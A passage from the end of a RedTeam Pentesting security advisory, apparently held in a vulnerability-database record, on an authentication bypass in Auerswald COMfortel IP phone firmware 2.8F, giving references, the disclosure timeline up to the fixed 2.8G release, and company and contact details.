for\r\nthe web-based management interface and therefore poses a high risk.\r\n\r\n\r\nReferences\r\n==========\r\n\r\n[1] https://curl.se\r\n[2] https://github.com/zaproxy/zaproxy/\r\n\r\nTimeline\r\n========\r\n\r\n2021-08-26 Vulnerability identified\r\n2021-09-01 Customer approved disclosure to vendor\r\n2021-09-10 Vendor notified\r\n2021-09-10 CVE ID requested\r\n2021-09-10 CVE ID assigned\r\n2021-10-04 Vendor provides access to device with fixed firmware\r\n2021-10-05 RedTeam Pentesting examines device, vulnerability seems to be corrected\r\n2021-10-14 Vendor releases corrected firmware version 2.8G\r\n2021-12-06 Advisory published\r\n\r\n\r\nRedTeam Pentesting GmbH\r\n=======================\r\n\r\nRedTeam Pentesting offers individual penetration tests performed by a\r\nteam of specialised IT-security experts. Hereby, security weaknesses in\r\ncompany networks or products are uncovered and can be fixed immediately.\r\n\r\nAs there are only few experts in this field, RedTeam Pentesting wants to\r\nshare its knowledge and enhance the public knowledge with research in\r\nsecurity-related areas. The results are made available as public\r\nsecurity advisories.\r\n\r\nMore information about RedTeam Pentesting can be found at:\r\nhttps://www.redteam-pentesting.de/\r\n\r\n\r\nWorking at RedTeam Pentesting\r\n=============================\r\n\r\nRedTeam Pentesting is looking for penetration testers to join our team\r\nin Aachen, Germany. If you are interested please visit:\r\nhttps://www.redteam-pentesting.de/jobs/\r\n\r\n\r\n-- \r\nRedTeam Pentesting GmbH Tel.: +49 241 510081-0\r\nDennewartstr. 25-27 Fax : +49 241 510081-99\r\n52068 Aachen https://www.redteam-pentesting.de\r\nGermany Registergericht: Aachen HRB 14004\r\nGesch\u00e4ftsf\u00fchrer: Patrick Hof, Jens Liebchen", "sourceHref": "https://www.exploit-db.com/download/50565", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}

Auerswald COMfortel 1400/2600/3600 IP 2.8F Authentication Bypass

Description

Related